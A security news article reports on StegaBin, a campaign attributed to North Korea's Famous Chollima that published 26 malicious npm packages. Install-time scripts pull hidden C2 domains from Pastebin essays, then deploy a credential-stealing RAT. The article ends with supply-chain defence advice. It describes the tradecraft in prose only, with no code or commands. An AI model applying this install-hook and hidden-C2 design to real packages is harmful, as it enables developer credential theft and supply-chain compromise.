StegaBin Resurfaces: North Korean Actors Push 26 Malicious npm Packages with Pastebin-Based C2

By Ash K
StegaBin Resurfaces: North Korean Actors Push 26 Malicious npm Packages with Pastebin-Based C2

A fresh wave of malicious npm packages has been attributed to the North Korean threat cluster known as Famous Chollima, marking a new phase in the long-running Contagious Interview campaign. Researchers have identified 26 weaponized packages published to the npm ecosystem, all disguised as legitimate developer utilities.

This iteration, tracked as StegaBin, targets software developers directly. Once installed, the packages deploy a credential stealer and a cross-platform remote access trojan designed to operate across Windows, macOS, and Linux environments.

How the Attack Works

The infection chain begins with a seemingly harmless npm dependency. Embedded within each malicious package is an install.js script that executes during installation. Rather than connecting directly to a visible command-and-control endpoint, the script retrieves data from Pastebin-hosted essays.

Hidden inside these essays are steganographically embedded C2 domain references hosted on Vercel infrastructure. The loader extracts these domains and uses them to fetch second-stage payloads. This layered approach obscures infrastructure indicators and complicates detection efforts.

By separating initial access from C2 delivery and embedding configuration within legitimate text content, the attackers significantly reduce the visibility of their command infrastructure.

Capabilities of the Cross-Platform RAT

The deployed malware functions as both a credential harvester and a fully capable remote access trojan. It establishes persistence within Visual Studio Code environments, allowing it to survive reboots and development sessions.

Observed capabilities include:

  • Keylogging to capture developer credentials and passphrases
  • Browser credential theft targeting saved passwords and session cookies
  • Cryptocurrency wallet credential harvesting
  • Execution of TruffleHog-style scanning to identify exposed secrets
  • Git repository and SSH key exfiltration

By targeting developers, the attackers aim not merely to compromise endpoints but to gain access to source code repositories, CI/CD environments, cloud credentials, and software supply chains downstream.

Developer Ecosystem as a Strategic Target

The Contagious Interview campaign has historically focused on infiltrating development environments under the guise of job recruitment, testing assignments, or coding exercises. This new approach shifts the vector to npm packages, leveraging the trust developers place in open-source tooling.

Supply chain compromises within package registries offer scalable access. A single infected dependency can cascade into multiple enterprise environments if adopted by widely used projects.

The use of install-time scripts further increases the likelihood of successful execution, as many developers do not scrutinize dependency installation hooks.

Steganography and Infrastructure Evasion

The StegaBin loader’s reliance on Pastebin essays for configuration retrieval demonstrates an evolving tradecraft. Instead of embedding hardcoded C2 domains within the malware itself, attackers use publicly accessible content platforms to dynamically stage operational data.

This technique allows rapid rotation of backend infrastructure while minimizing static indicators within package source code. Hosting C2 domains on Vercel adds another layer of legitimacy, as traffic appears to originate from widely trusted cloud infrastructure.

Implications for Software Supply Chain Security

The campaign reinforces a persistent risk within open-source ecosystems: dependency trust is often implicit. Automated build pipelines, continuous integration systems, and rapid prototyping workflows frequently pull packages without deep inspection.

Organizations should enforce strict dependency governance policies, including:

  • Lockfile verification and integrity checks
  • Monitoring for suspicious install-time scripts
  • Restricting outbound connections from development environments
  • Implementing secrets scanning within repositories
  • Auditing VS Code extensions and persistence artifacts

For high-risk development teams, isolating build environments from production credentials and implementing ephemeral developer workstations can significantly reduce blast radius.

A Continuing Pattern

Famous Chollima has consistently targeted developers as a means to infiltrate broader supply chains. The StegaBin variant shows a maturation in concealment techniques, blending steganography, legitimate cloud services, and multi-platform payloads into a cohesive operation.

As developer tooling ecosystems grow more interconnected, the attack surface expands accordingly. The lesson is clear: security cannot stop at the perimeter. It must extend into the code editor, the package manager, and every dependency that enters the build pipeline.

Ash K
Ash K
Ashton is a seasoned Cybersecurity Professional with over 25 years of experience in Cybersecurity Research, Cybersecurity Incident response, Products and Security Solutions architecture.